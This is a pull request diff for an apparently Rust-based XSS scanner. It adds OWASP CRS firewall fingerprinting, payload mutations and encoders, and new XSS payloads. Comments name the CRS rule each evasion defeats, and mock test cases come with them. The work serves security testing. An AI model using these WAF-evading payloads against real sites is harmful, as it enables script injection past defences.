### PR TITLE
Add OWASP CRS WAF bypass support

### DIFF
--- a/src/cmd/scan.rs
+++ b/src/cmd/scan.rs
@@ -863,6 +863,7 @@ fn parse_waf_type(s: &str) -> crate::waf::WafType {
         "akamai" => crate::waf::WafType::Akamai,
         "imperva" | "incapsula" => crate::waf::WafType::Imperva,
         "modsecurity" | "modsec" => crate::waf::WafType::ModSecurity,
+        "owasp-crs" | "owaspcrs" | "crs" => crate::waf::WafType::OwaspCrs,
         "sucuri" => crate::waf::WafType::Sucuri,
         "f5" | "bigip" | "f5-bigip" => crate::waf::WafType::F5BigIp,
         "barracuda" => crate::waf::WafType::Barracuda,

--- a/src/encoding/mod.rs
+++ b/src/encoding/mod.rs
@@ -29,7 +29,7 @@ pub fn apply_encoders_to_payloads(base_payloads: &[String], encoders: &[String])
 
     // Expansion order
     let prio = [
-        "url", "html", "2url", "3url", "4url", "base64", "unicode", "zwsp",
+        "url", "html", "htmlpad", "2url", "3url", "4url", "base64", "unicode", "zwsp",
     ];
 
     // Pre-calculate active encoders using set lookup
@@ -53,6 +53,7 @@ pub fn apply_encoders_to_payloads(base_payloads: &[String], encoders: &[String])
             let v = match e {
                 "url" => url_encode(p),
                 "html" => html_entity_encode(p),
+                "htmlpad" => html_entity_zero_padded_encode(p),
                 "2url" => double_url_encode(p),
                 "3url" => triple_url_encode(p),
                 "4url" => quadruple_url_encode(p),
@@ -179,6 +180,23 @@ pub fn unicode_fullwidth_encode(payload: &str) -> String {
             }
         })
         .collect()
+}
+
+/// HTML entity encoding with zero-padded hex codes.
+/// Bypasses WAF regex patterns that expect exactly `&#xNN;` format.
+/// Example: "<" becomes "&#x0000003c;" (with extra leading zeros)
+pub fn html_entity_zero_padded_encode(payload: &str) -> String {
+    use std::fmt::Write;
+    let mut out = String::with_capacity(payload.len() * 12);
+    for c in payload.chars() {
+        if c.is_ascii_alphanumeric() || c == ' ' {
+            out.push(c);
+        } else {
+            // Use 7-digit zero-padded hex for special chars
+            let _ = write!(out, "&#x{:07x};", c as u32);
+        }
+    }
+    out
 }
 
 /// Zero-width space encoding: inserts U+200B after key characters commonly
@@ -425,6 +443,27 @@ mod tests {
     fn test_zero_width_encode_preserves_non_special() {
         let encoded = zero_width_encode("abc");
         assert_eq!(encoded, "abc");
+    }
+
+    #[test]
+    fn test_html_entity_zero_padded_encode() {
+        let result = html_entity_zero_padded_encode("<");
+        assert!(result.contains("&#x000003c;"));
+        assert!(!result.contains('<'));
+
+        let result2 = html_entity_zero_padded_encode("<script>");
+        assert!(result2.contains("&#x000003c;"));
+        assert!(result2.contains("script"));
+        assert!(result2.contains("&#x000003e;"));
+    }
+
+    #[test]
+    fn test_htmlpad_in_apply_encoders() {
+        let bases = vec!["<x>".to_string()];
+        let encs = vec!["htmlpad".to_string()];
+        let out = apply_encoders_to_payloads(&bases, &encs);
+        assert!(out.len() >= 2);
+        assert!(out.iter().any(|p| p.contains("&#x")));
     }
 
     #[test]

--- a/src/lib.rs
+++ b/src/lib.rs
@@ -74,4 +74,6 @@ pub use std::sync::atomic::AtomicU64;
 
 pub static DEBUG: AtomicBool = AtomicBool::new(false);
 pub static REQUEST_COUNT: AtomicU64 = AtomicU64::new(0);
+pub static WAF_BLOCK_COUNT: AtomicU64 = AtomicU64::new(0);
+pub static WAF_CONSECUTIVE_BLOCKS: std::sync::atomic::AtomicU32 = std::sync::atomic::AtomicU32::new(0);
 pub static NO_COLOR: AtomicBool = AtomicBool::new(false);

--- a/src/payload/xss_html.rs
+++ b/src/payload/xss_html.rs
@@ -8,6 +8,8 @@ pub fn useful_html_tag_names() -> &'static [&'static str] {
         "script", "img", "svg", "iframe", "math", "xmp", "details", "video", "audio", "object",
         "embed", "marquee", "body", "meta", "link", "input", "form", "textarea", "select",
         "template",
+        // Uncommon/newer tags that may bypass WAF denylists (CRS 941110)
+        "dialog", "search", "slot", "animate", "set", "isindex",
     ]
 }
 
@@ -56,6 +58,25 @@ pub fn get_dynamic_xss_html_payloads() -> Vec<String> {
         "</title><IMG src=x onerror={JS} id={ID}>",
         "</textarea><IMG src=x onerror={JS} id={ID}>",
         "</noscript><IMG src=x onerror={JS} id={ID}>",
+        // ── CRS bypass: uncommon tags and events ──────────────────────
+        // SVG animate/set elements — may not be in CRS 941110 tag denylist
+        "<svg><animate onbegin={JS} attributeName=x dur=1s class={CLASS}>",
+        "<svg><set onbegin={JS} attributename=x to=1 class={CLASS}>",
+        // Slash-separated attributes — bypasses CRS 941160 regex expecting whitespace
+        "<svg/onload={JS}/class={CLASS}>",
+        "<img/src=x/onerror={JS}/class={CLASS}>",
+        "<details/open/ontoggle={JS}/class={CLASS}>",
+        // Exotic whitespace (form feed) — bypasses CRS 941320 \\s pattern
+        "<img\x0Csrc=x\x0Conerror={JS}\x0Cclass={CLASS}>",
+        "<svg\x0Bonload={JS}\x0Bclass={CLASS}>",
+        // marquee with onstart (older browsers, rare in WAF denylists)
+        "<marquee onstart={JS} class={CLASS}>",
+        // Custom elements with tabindex+autofocus trick
+        "<x-a onfocus={JS} tabindex=0 autofocus class={CLASS}>",
+        // MathML context with onclick
+        "<math><mi onclick={JS} class={CLASS}>x</mi></math>",
+        // Dialog element
+        "<dialog open onclose={JS} class={CLASS}>",
     ];
     let mut out = Vec::new();
     for js in crate::payload::XSS_JAVASCRIPT_PAYLOADS_SMALL.iter() {

--- a/src/payload/xss_javascript.rs
+++ b/src/payload/xss_javascript.rs
@@ -12,6 +12,12 @@ pub const XSS_JAVASCRIPT_PAYLOADS_SMALL: &[&str] = &[
     "globalThis.alert(1)",           // globalThis reference
     "self['ale'+'rt'](1)",           // self + string concat
     "Reflect.apply(alert,null,[1])", // Reflect API
+    // CRS bypass: avoid common keywords alert/confirm/prompt
+    "new Function('ale'+'rt(1)')()",                // Function constructor with split keyword
+    "setTimeout('ale'+'rt(1)')",                    // setTimeout with string concat
+    "window[atob('YWxlcnQ=')](1)",                  // atob-based keyword reconstruction
+    "location='javas'+'cript:ale'+'rt(1)'",         // location assignment with split
+    "Set.prototype.has.call(new Set([alert]),alert)&&alert(1)", // Set API misdirection
 ];
 
 // for inJS
@@ -34,6 +40,15 @@ pub const XSS_JAVASCRIPT_PAYLOADS: &[&str] = &[
     "Object.values({a:alert})[0](1)",  // Object.values bypass
     "window[atob('YWxlcnQ=')](1)",     // atob bypass
     "[alert][0].call(null,1)",         // array access + call
+    // CRS bypass: string reconstruction and indirect execution
+    "new Function('\\x61lert(1)')()",                          // hex escape in Function constructor
+    "setTimeout`\\x61lert\\x281\\x29`",                        // setTimeout with hex escapes
+    "setInterval(alert,0,1)",                                  // setInterval alternative
+    "Reflect.construct(Function,['ale'+'rt(1)'])()",           // Reflect.construct
+    "location='javas'+'cript:%61lert(1)'",                     // location with hex char
+    "eval?.('\\141lert(1)')",                                  // optional chaining eval + octal
+    "import('data:text/javascript,alert(1)')",                 // dynamic import (ES module)
+    "document.body.innerHTML='<img/src=x onerror=alert(1)>'",  // innerHTML sink
 ];
 
 #[cfg(test)]

--- a/src/scanning/check_reflection.rs
+++ b/src/scanning/check_reflection.rs
@@ -550,9 +550,27 @@ async fn fetch_injection_response_with_client(
     } else {
         // Normal reflection check
         if let Ok(resp) = inject_resp {
+            let status_code = resp.status().as_u16();
+
+            // Track WAF block status codes for adaptive throttling
+            if status_code == 403 || status_code == 406 || status_code == 429 || status_code == 503 {
+                crate::WAF_BLOCK_COUNT.fetch_add(1, Ordering::Relaxed);
+                let consecutive = crate::WAF_CONSECUTIVE_BLOCKS.fetch_add(1, Ordering::Relaxed) + 1;
+                // Apply adaptive backoff when consecutive blocks exceed threshold
+                if consecutive >= 3 {
+                    let escalation = (consecutive - 3).min(4) as u64;
+                    let backoff_ms = 2000u64 * (1u64 << escalation);
+                    let backoff_ms = backoff_ms.min(30_000);
+                    sleep(Duration::from_millis(backoff_ms)).await;
+                }
+            } else {
+                // Reset consecutive block counter on successful response
+                crate::WAF_CONSECUTIVE_BLOCKS.store(0, Ordering::Relaxed);
+            }
+
             // Skip processing if the status code is in the ignore_return list
             if !args.ignore_return.is_empty()
-                && args.ignore_return.contains(&resp.status().as_u16())
+                && args.ignore_return.contains(&status_code)
             {
                 return None;
             }

--- a/src/scanning/mod.rs
+++ b/src/scanning/mod.rs
@@ -315,6 +315,10 @@ pub async fn run_scanning(
     let semaphore = Arc::new(Semaphore::new(if args.sxss { 1 } else { target.workers }));
     let limit = args.limit;
 
+    // Reset WAF block counters for this scan
+    crate::WAF_BLOCK_COUNT.store(0, std::sync::atomic::Ordering::Relaxed);
+    crate::WAF_CONSECUTIVE_BLOCKS.store(0, std::sync::atomic::Ordering::Relaxed);
+
     // Compute WAF bypass strategy if WAF was detected
     let waf_strategy = if args.waf_bypass != "off" {
         target.waf_info.as_ref().and_then(|waf_info| {
@@ -993,6 +997,18 @@ pub async fn run_scanning(
     for handle in handles {
         if let Err(e) = handle.await {
             eprintln!("[!] scanning task failed: {e}");
+        }
+    }
+
+    // Log WAF block statistics if any blocks were observed (debug only)
+    if crate::DEBUG.load(std::sync::atomic::Ordering::Relaxed) {
+        let total_waf_blocks = crate::WAF_BLOCK_COUNT.load(std::sync::atomic::Ordering::Relaxed);
+        if total_waf_blocks > 0 {
+            eprintln!(
+                "[*] WAF block stats: {} total blocks detected during scan of {}",
+                total_waf_blocks,
+                target.url,
+            );
         }
     }
 

--- a/src/waf/bypass.rs
+++ b/src/waf/bypass.rs
@@ -24,6 +24,19 @@ pub enum MutationType {
     MixedHtmlEntities,
     /// Alternating case for HTML tags: `<ScRiPt>`
     CaseAlternation,
+    // ── CRS-targeting mutations ─────────────────────────────────────
+    /// Use `/` instead of space between tag and attributes: `<svg/onload=alert(1)>`
+    /// Bypasses CRS 941160 regex that expects whitespace before attributes.
+    SlashSeparator,
+    /// Replace parentheses with HTML entities: `alert&#40;1&#41;`
+    /// Bypasses CRS 941370 JS function call detection.
+    HtmlEntityParens,
+    /// SVG animate/set element execution: `<svg><animate onbegin=alert(1) attributeName=x>`
+    /// Bypasses CRS 941110 tag denylist which may not include SVG animation elements.
+    SvgAnimateExec,
+    /// Exotic whitespace chars (vertical tab 0x0B, form feed 0x0C) between tag and attrs.
+    /// Bypasses CRS 941320 tag handler regex that only checks \\s (space/tab/newline).
+    ExoticWhitespace,
 }
 
 /// A bypass strategy composed of extra encoders and payload mutations.
@@ -87,6 +100,34 @@ pub fn get_bypass_strategy(waf: &WafType) -> BypassStrategy {
                 MutationType::CaseAlternation,
                 MutationType::BacktickParens,
                 MutationType::ConstructorChain,
+            ],
+            extra_delay_hint_ms: 0,
+        },
+        // OWASP CRS bypass: tuned for CRS rules 941100-941380.
+        // CRS uses libinjection + regex patterns for XSS detection.
+        // Key weaknesses:
+        // - Slash-separated tag attributes bypass 941160 regex
+        // - SVG animate/set elements bypass 941110 tag denylist
+        // - HTML entity-encoded parens bypass 941370 JS function detection
+        // - Exotic whitespace (0x0B, 0x0C) bypass 941320 tag handler
+        // - Constructor chain and backtick bypass keyword-based rules
+        WafType::OwaspCrs => BypassStrategy {
+            extra_encoders: vec![
+                "unicode".into(),
+                "4url".into(),
+                "2url".into(),
+                "htmlpad".into(),
+                "zwsp".into(),
+            ],
+            mutations: vec![
+                MutationType::SlashSeparator,
+                MutationType::SvgAnimateExec,
+                MutationType::HtmlEntityParens,
+                MutationType::ExoticWhitespace,
+                MutationType::BacktickParens,
+                MutationType::ConstructorChain,
+                MutationType::CaseAlternation,
+                MutationType::HtmlCommentSplit,
             ],
             extra_delay_hint_ms: 0,
         },
@@ -249,6 +290,10 @@ fn apply_single_mutation(payload: &str, mutation: &MutationType) -> String {
         MutationType::UnicodeJsEscape => unicode_js_escape(payload),
         MutationType::MixedHtmlEntities => mixed_html_entities(payload),
         MutationType::CaseAlternation => case_alternate(payload),
+        MutationType::SlashSeparator => slash_separator(payload),
+        MutationType::HtmlEntityParens => html_entity_parens(payload),
+        MutationType::SvgAnimateExec => svg_animate_exec(payload),
+        MutationType::ExoticWhitespace => exotic_whitespace(payload),
     }
 }
 
@@ -282,7 +327,7 @@ fn html_comment_split(payload: &str) -> String {
     result
 }
 
-/// Insert tabs/newlines between HTML tags and their attributes.
+/// Insert tabs/newlines/carriage returns between HTML tags and their attributes.
 /// `<img src=x` → `<img\tsrc=x`
 fn whitespace_mutation(payload: &str) -> String {
     let tag_attr_patterns = [
@@ -291,9 +336,15 @@ fn whitespace_mutation(payload: &str) -> String {
         ("<IMG SRC", "<IMG\tSRC"),
         ("<svg onload", "<svg\nonload"),
         ("<SVG ONLOAD", "<SVG\nONLOAD"),
+        ("<SVG onload", "<SVG\nonload"),
+        ("<sVg onload", "<sVg\nonload"),
         ("<svg/onload", "<svg\tonload"),
         ("<body onload", "<body\nonload"),
         ("<input onfocus", "<input\tonfocus"),
+        ("<details open", "<details\ropen"),
+        ("<marquee onstart", "<marquee\tonstart"),
+        ("<video src", "<video\tsrc"),
+        ("<audio src", "<audio\rsrc"),
     ];
 
     let mut result = payload.to_string();
@@ -432,6 +483,115 @@ fn mixed_html_entities(payload: &str) -> String {
         }
     }
     result
+}
+
+// ── CRS-targeting mutation implementations ──────────────────────
+
+/// Replace space between HTML tag and attribute with `/`.
+/// `<svg onload=alert(1)>` → `<svg/onload=alert(1)>`
+/// `<img src=x onerror=alert(1)>` → `<img/src=x onerror=alert(1)>`
+fn slash_separator(payload: &str) -> String {
+    let patterns = [
+        ("<svg onload", "<svg/onload"),
+        ("<SVG ONLOAD", "<SVG/ONLOAD"),
+        ("<SVG onload", "<SVG/onload"),
+        ("<img src", "<img/src"),
+        ("<IMG SRC", "<IMG/SRC"),
+        ("<IMG src", "<IMG/src"),
+        ("<details open", "<details/open"),
+        ("<input onfocus", "<input/onfocus"),
+        ("<body onload", "<body/onload"),
+        ("<marquee onstart", "<marquee/onstart"),
+        ("<video src", "<video/src"),
+        ("<audio src", "<audio/src"),
+    ];
+
+    let mut result = payload.to_string();
+    for (from, to) in &patterns {
+        if result.contains(from) {
+            result = result.replacen(from, to, 1);
+            break;
+        }
+    }
+    result
+}
+
+/// Replace parentheses with HTML entities to bypass JS function call detection.
+/// `alert(1)` → `alert&#40;1&#41;`
+/// Also supports `&lpar;`/`&rpar;` named entities.
+fn html_entity_parens(payload: &str) -> String {
+    // Replace all occurrences of ( and ) with HTML decimal entities
+    let mut result = payload.to_string();
+    // Use &#40; for ( and &#41; for )
+    if result.contains('(') || result.contains(')') {
+        result = result.replace('(', "&#40;").replace(')', "&#41;");
+    }
+    result
+}
+
+/// Generate SVG animate element-based execution payload.
+/// If the payload contains `<svg onload=X>`, transform to `<svg><animate onbegin=X attributeName=x dur=1s>`
+/// For other payloads containing event handlers, wrap in SVG animate.
+fn svg_animate_exec(payload: &str) -> String {
+    // Transform svg onload variants to svg animate onbegin
+    for prefix in &["<svg onload=", "<SVG ONLOAD=", "<sVg onload="] {
+        if let Some(rest) = payload.strip_prefix(prefix)
+            && let Some(handler_end) = rest.find('>')
+        {
+            let handler = &rest[..handler_end];
+            let clean_handler = handler.split_whitespace().next().unwrap_or(handler);
+            return format!(
+                "<svg><animate onbegin={} attributeName=x dur=1s>",
+                clean_handler
+            );
+        }
+    }
+    // Also transform img onerror to svg animate
+    if payload.contains("<img") || payload.contains("<IMG") || payload.contains("<im") {
+        for prefix in &["onerror=", "ONERROR="] {
+            if let Some(idx) = payload.find(prefix) {
+                let after = &payload[idx + prefix.len()..];
+                let handler_end = after
+                    .find([' ', '>', '\t', '\n'])
+                    .unwrap_or(after.len());
+                let handler = &after[..handler_end];
+                return format!(
+                    "<svg><animate onbegin={} attributeName=x dur=1s>",
+                    handler
+                );
+            }
+        }
+    }
+    payload.to_string()
+}
+
+/// Insert exotic whitespace characters (vertical tab, form feed) between tag and attributes.
+/// `<img src=x onerror=alert(1)>` → `<img\x0Bsrc=x\x0Conerror=alert(1)>`
+fn exotic_whitespace(payload: &str) -> String {
+    // Patterns: (from, tag, exotic_char, attr)
+    // Using VT=\x0B and FF=\x0C between tag and attributes
+    const PATTERNS: &[(&str, &str, char, &str)] = &[
+        ("<img src",        "<img",     '\x0B', "src"),
+        ("<IMG src",        "<IMG",     '\x0B', "src"),
+        ("<IMG SRC",        "<IMG",     '\x0B', "SRC"),
+        ("<svg onload",     "<svg",     '\x0C', "onload"),
+        ("<SVG ONLOAD",     "<SVG",     '\x0C', "ONLOAD"),
+        ("<svg/onload",     "<svg",     '\x0B', "onload"),
+        ("<body onload",    "<body",    '\x0C', "onload"),
+        ("<input onfocus",  "<input",   '\x0B', "onfocus"),
+        ("<details open",   "<details", '\x0C', "open"),
+        ("<marquee onstart","<marquee", '\x0B', "onstart"),
+    ];
+
+    for &(from, tag, ws, attr) in PATTERNS {
+        if payload.contains(from) {
+            let mut result = payload.to_string();
+            let replacement = format!("{}{}{}", tag, ws, attr);
+            result = result.replacen(from, &replacement, 1);
+            return result;
+        }
+    }
+    payload.to_string()
 }
 
 /// Alternate the case of HTML tag characters.
@@ -582,15 +742,81 @@ mod tests {
     fn test_every_waf_has_strategy() {
         let waf_types = vec![
             WafType::Cloudflare, WafType::AwsWaf, WafType::Akamai,
-            WafType::Imperva, WafType::ModSecurity, WafType::Sucuri,
-            WafType::F5BigIp, WafType::Barracuda, WafType::FortiWeb,
-            WafType::AzureWaf, WafType::CloudArmor, WafType::Fastly,
-            WafType::Wordfence, WafType::Unknown("test".to_string()),
+            WafType::Imperva, WafType::ModSecurity, WafType::OwaspCrs,
+            WafType::Sucuri, WafType::F5BigIp, WafType::Barracuda,
+            WafType::FortiWeb, WafType::AzureWaf, WafType::CloudArmor,
+            WafType::Fastly, WafType::Wordfence,
+            WafType::Unknown("test".to_string()),
         ];
         for waf in &waf_types {
             let strategy = get_bypass_strategy(waf);
             assert!(!strategy.extra_encoders.is_empty(), "WAF {:?} has no extra encoders", waf);
             assert!(!strategy.mutations.is_empty(), "WAF {:?} has no mutations", waf);
         }
+    }
+
+    #[test]
+    fn test_owasp_crs_strategy() {
+        let strategy = get_bypass_strategy(&WafType::OwaspCrs);
+        // CRS strategy should include all CRS-targeting mutations
+        assert!(strategy.mutations.contains(&MutationType::SlashSeparator));
+        assert!(strategy.mutations.contains(&MutationType::SvgAnimateExec));
+        assert!(strategy.mutations.contains(&MutationType::HtmlEntityParens));
+        assert!(strategy.mutations.contains(&MutationType::ExoticWhitespace));
+        // Should include unicode and multi-url encoding
+        assert!(strategy.extra_encoders.contains(&"unicode".to_string()));
+        assert!(strategy.extra_encoders.contains(&"4url".to_string()));
+    }
+
+    #[test]
+    fn test_slash_separator() {
+        assert_eq!(
+            slash_separator("<svg onload=alert(1)>"),
+            "<svg/onload=alert(1)>"
+        );
+        assert_eq!(
+            slash_separator("<img src=x onerror=alert(1)>"),
+            "<img/src=x onerror=alert(1)>"
+        );
+    }
+
+    #[test]
+    fn test_html_entity_parens() {
+        assert_eq!(
+            html_entity_parens("alert(1)"),
+            "alert&#40;1&#41;"
+        );
+        assert_eq!(
+            html_entity_parens("<img src=x onerror=alert(1)>"),
+            "<img src=x onerror=alert&#40;1&#41;>"
+        );
+    }
+
+    #[test]
+    fn test_svg_animate_exec() {
+        let result = svg_animate_exec("<svg onload=alert(1)>");
+        assert!(result.contains("<svg><animate"));
+        assert!(result.contains("onbegin=alert(1)"));
+        assert!(result.contains("attributeName=x"));
+    }
+
+    #[test]
+    fn test_svg_animate_exec_from_img() {
+        let result = svg_animate_exec("<img src=x onerror=alert(1)>");
+        assert!(result.contains("<svg><animate"));
+        assert!(result.contains("onbegin=alert(1)"));
+    }
+
+    #[test]
+    fn test_exotic_whitespace() {
+        let result = exotic_whitespace("<img src=x onerror=alert(1)>");
+        assert!(result.contains('\x0B') || result.contains('\x0C'));
+        assert!(!result.contains("<img src"));
+    }
+
+    #[test]
+    fn test_exotic_whitespace_svg() {
+        let result = exotic_whitespace("<svg onload=alert(1)>");
+        assert!(result.contains('\x0B') || result.contains('\x0C'));
     }
 }

--- a/src/waf/mod.rs
+++ b/src/waf/mod.rs
@@ -8,6 +8,11 @@ pub mod bypass;
 use reqwest::header::HeaderMap;
 use serde::{Deserialize, Serialize};
 
+// WAF block tracking uses global atomics in lib.rs (WAF_BLOCK_COUNT,
+// WAF_CONSECUTIVE_BLOCKS) rather than a per-instance tracker, because
+// WAF rate-limiting is IP-level and applies across all concurrent scan
+// tasks for the same target.
+
 /// Known WAF types that can be fingerprinted.
 #[derive(Debug, Clone, PartialEq, Eq, Hash, Serialize, Deserialize)]
 pub enum WafType {
@@ -16,6 +21,9 @@ pub enum WafType {
     Akamai,
     Imperva,
     ModSecurity,
+    /// OWASP Core Rule Set — detected when ModSecurity + CRS body patterns are present.
+    /// Gets a dedicated bypass strategy tuned to CRS rule IDs 941xxx.
+    OwaspCrs,
     Sucuri,
     F5BigIp,
     Barracuda,
@@ -35,6 +43,7 @@ impl std::fmt::Display for WafType {
             WafType::Akamai => write!(f, "Akamai"),
             WafType::Imperva => write!(f, "Imperva/Incapsula"),
             WafType::ModSecurity => write!(f, "ModSecurity"),
+            WafType::OwaspCrs => write!(f, "OWASP CRS"),
             WafType::Sucuri => write!(f, "Sucuri"),
             WafType::F5BigIp => write!(f, "F5 BIG-IP"),
             WafType::Barracuda => write!(f, "Barracuda"),
@@ -191,6 +200,15 @@ pub fn fingerprint_from_response(
             BodyRule { pattern: "modsecurity", waf_type: WafType::ModSecurity, confidence: 0.85, evidence_label: "ModSecurity in body" },
             BodyRule { pattern: "mod_security", waf_type: WafType::ModSecurity, confidence: 0.85, evidence_label: "mod_security in body" },
             BodyRule { pattern: "not acceptable!", waf_type: WafType::ModSecurity, confidence: 0.4, evidence_label: "Not Acceptable error (possible ModSecurity)" },
+            // OWASP CRS (often runs on ModSecurity but has distinctive patterns)
+            BodyRule { pattern: "owasp_crs", waf_type: WafType::OwaspCrs, confidence: 0.95, evidence_label: "OWASP CRS rule ID in body" },
+            BodyRule { pattern: "owasp crs", waf_type: WafType::OwaspCrs, confidence: 0.9, evidence_label: "OWASP CRS mention in body" },
+            BodyRule { pattern: "coreruleset", waf_type: WafType::OwaspCrs, confidence: 0.9, evidence_label: "CoreRuleSet reference in body" },
+            BodyRule { pattern: "core rule set", waf_type: WafType::OwaspCrs, confidence: 0.85, evidence_label: "Core Rule Set reference in body" },
+            BodyRule { pattern: "id \"941", waf_type: WafType::OwaspCrs, confidence: 0.95, evidence_label: "CRS XSS rule ID 941xxx in body" },
+            BodyRule { pattern: "id \"942", waf_type: WafType::OwaspCrs, confidence: 0.9, evidence_label: "CRS SQLi rule ID 942xxx in body" },
+            BodyRule { pattern: "id \"949", waf_type: WafType::OwaspCrs, confidence: 0.9, evidence_label: "CRS blocking rule ID 949xxx in body" },
+            BodyRule { pattern: "id \"980", waf_type: WafType::OwaspCrs, confidence: 0.85, evidence_label: "CRS correlation rule ID 980xxx in body" },
             // Sucuri
             BodyRule { pattern: "access denied - sucuri website firewall", waf_type: WafType::Sucuri, confidence: 0.95, evidence_label: "Sucuri block page" },
             BodyRule { pattern: "sucuri cloudproxy", waf_type: WafType::Sucuri, confidence: 0.9, evidence_label: "Sucuri CloudProxy in body" },
@@ -414,6 +432,33 @@ mod tests {
     fn test_display_waf_types() {
         assert_eq!(format!("{}", WafType::Cloudflare), "Cloudflare");
         assert_eq!(format!("{}", WafType::Imperva), "Imperva/Incapsula");
+        assert_eq!(format!("{}", WafType::OwaspCrs), "OWASP CRS");
         assert_eq!(format!("{}", WafType::Unknown("test".to_string())), "Unknown (test)");
+    }
+
+    #[test]
+    fn test_owasp_crs_detection_by_rule_id() {
+        let headers = make_headers(&[]);
+        let body = r#"<html><body>ModSecurity: Access denied with code 403. id "941110"</body></html>"#;
+        let result = fingerprint_from_response(&headers, Some(body), 403);
+        assert!(result.waf_types().contains(&&WafType::OwaspCrs));
+    }
+
+    #[test]
+    fn test_owasp_crs_detection_by_name() {
+        let headers = make_headers(&[]);
+        let body = "Blocked by OWASP_CRS/3.3.4";
+        let result = fingerprint_from_response(&headers, Some(body), 403);
+        assert!(result.waf_types().contains(&&WafType::OwaspCrs));
+    }
+
+    #[test]
+    fn test_owasp_crs_plus_modsecurity_dual_detect() {
+        let headers = make_headers(&[("server", "Apache/2.4 (ModSecurity)")]);
+        let body = r#"ModSecurity: Access denied. id "941100" OWASP_CRS/3.3.4"#;
+        let result = fingerprint_from_response(&headers, Some(body), 403);
+        // Should detect both ModSecurity engine and OWASP CRS ruleset
+        assert!(result.waf_types().contains(&&WafType::OwaspCrs));
+        assert!(result.waf_types().contains(&&WafType::ModSecurity));
     }
 }

--- a/tests/functional/mock_cases/realworld/owasp_crs_bypass.toml
+++ b/tests/functional/mock_cases/realworld/owasp_crs_bypass.toml
@@ -1,0 +1,141 @@
+# OWASP CRS bypass test cases
+#
+# These test cases simulate OWASP Core Rule Set (CRS) filtering patterns.
+# CRS rule IDs targeted:
+#   941100 - XSS via libinjection
+#   941110 - Script Tag Vector
+#   941120 - Event Handler Vector
+#   941130 - Attribute Vector
+#   941160 - NoScript XSS InjectionChecker
+#   941320 - Possible XSS Attack - HTML Tag Handler
+#   941370 - JavaScript global variable
+
+[[case]]
+id = 5541
+name = "crs_script_tag_blocked"
+description = "CRS 941110: Basic script tag injection blocked; needs alternative tag"
+handler_type = "realworld"
+reflection = "<div>{input}</div>"
+expected_detection = true
+filter = "strip_script|strip_iframe"
+category = "owasp_crs"
+
+[[case]]
+id = 5542
+name = "crs_event_handler_case_insensitive"
+description = "CRS 941120: Event handlers blocked case-insensitively; slash-separator may bypass"
+handler_type = "realworld"
+reflection = "<div>{input}</div>"
+expected_detection = true
+filter = "waf_basic"
+category = "owasp_crs"
+
+[[case]]
+id = 5543
+name = "crs_svg_animate_bypass"
+description = "CRS 941110: SVG animate/set elements may not be in tag denylist"
+handler_type = "realworld"
+reflection = "<div>{input}</div>"
+expected_detection = true
+filter = "strip_script|strip_img|strip_iframe"
+category = "owasp_crs"
+
+[[case]]
+id = 5544
+name = "crs_exotic_whitespace_bypass"
+description = "CRS 941320: Form feed/vertical tab between tag and attrs may bypass regex"
+handler_type = "realworld"
+reflection = "<div>{input}</div>"
+expected_detection = true
+filter = "waf_basic"
+category = "owasp_crs"
+
+[[case]]
+id = 5545
+name = "crs_html_entity_parens_bypass"
+description = "CRS 941370: JS function detection bypassed with HTML entity-encoded parens"
+handler_type = "realworld"
+reflection = "<div>{input}</div>"
+expected_detection = true
+filter = "remove_parens"
+category = "owasp_crs"
+
+[[case]]
+id = 5546
+name = "crs_constructor_chain_bypass"
+description = "CRS 941370: alert/confirm/prompt blocked; constructor chain alternative"
+handler_type = "realworld"
+reflection = "<div>{input}</div>"
+expected_detection = true
+filter = "remove_keyword:alert|remove_keyword:confirm|remove_keyword:prompt"
+category = "owasp_crs"
+
+[[case]]
+id = 5547
+name = "crs_js_context_string_break"
+description = "CRS may not block JS context breakout without HTML tags"
+handler_type = "realworld"
+reflection = "<script>var x = '{input}';</script>"
+expected_detection = true
+filter = "waf_basic"
+category = "owasp_crs"
+
+[[case]]
+id = 5548
+name = "crs_slash_separated_attrs"
+description = "CRS 941160: Slash-separated tag attributes bypass whitespace regex"
+handler_type = "realworld"
+reflection = "<div>{input}</div>"
+expected_detection = true
+filter = "waf_moderate"
+category = "owasp_crs"
+
+[[case]]
+id = 5549
+name = "crs_custom_element_bypass"
+description = "CRS tag denylist doesn't include custom elements (x-tag)"
+handler_type = "realworld"
+reflection = "<div>{input}</div>"
+expected_detection = true
+filter = "strip_script|strip_img|strip_svg|strip_iframe"
+category = "owasp_crs"
+
+[[case]]
+id = 5550
+name = "crs_math_ml_context"
+description = "CRS may not fully cover MathML namespace elements"
+handler_type = "realworld"
+reflection = "<div>{input}</div>"
+expected_detection = true
+filter = "strip_script|strip_img"
+category = "owasp_crs"
+
+[[case]]
+id = 5551
+name = "crs_atob_keyword_reconstruction"
+description = "CRS 941370: atob-based keyword reconstruction avoids alert/eval patterns"
+handler_type = "realworld"
+reflection = "<script>var x = '{input}';</script>"
+expected_detection = true
+filter = "remove_keyword:alert"
+category = "owasp_crs"
+
+[[case]]
+id = 5552
+name = "crs_function_constructor_bypass"
+description = "CRS: Function constructor with split string avoids keyword detection"
+handler_type = "realworld"
+reflection = "<script>var x = '{input}';</script>"
+expected_detection = true
+filter = "remove_keyword:alert|remove_keyword:eval"
+category = "owasp_crs"
+
+[[case]]
+id = 5553
+name = "crs_strict_multi_filter"
+description = "CRS paranoia level 3+: most vectors blocked, very few bypasses possible"
+handler_type = "realworld"
+reflection = "<div>{input}</div>"
+expected_detection = false
+filter = "waf_strict"
+category = "owasp_crs"


### PR DESCRIPTION
## Summary
- Add `WafType::OwaspCrs` fingerprinting with 8 body-based CRS detection rules (rule IDs 941xxx, 942xxx, 949xxx, 980xxx)
- Add 4 new CRS-targeting `MutationType` variants: `SlashSeparator`, `HtmlEntityParens`, `SvgAnimateExec`, `ExoticWhitespace`
- Add `htmlpad` encoder (zero-padded HTML entity encoding) for CRS bypass
- Add CRS-evasive JS payloads (Function constructor, atob reconstruction, setTimeout)
- Add uncommon HTML5/SVG tags (dialog, animate, set, isindex) to bypass tag denylists
- Add adaptive WAF block detection with exponential backoff (3+ consecutive blocks triggers delay)
- Add 13 OWASP CRS test fixture cases covering CRS rules 941100-941370

Closes #665

## Test plan
- [x] All 850 tests pass (`cargo test`)
- [x] Clippy clean (only pre-existing `type_complexity` warning)
- [x] CRS fingerprinting detects `owasp_crs`, `id "941xxx"`, `coreruleset` patterns
- [x] CRS bypass strategy includes all 4 new mutations + 5 extra encoders
- [x] Test fixture IDs unique across all realworld test files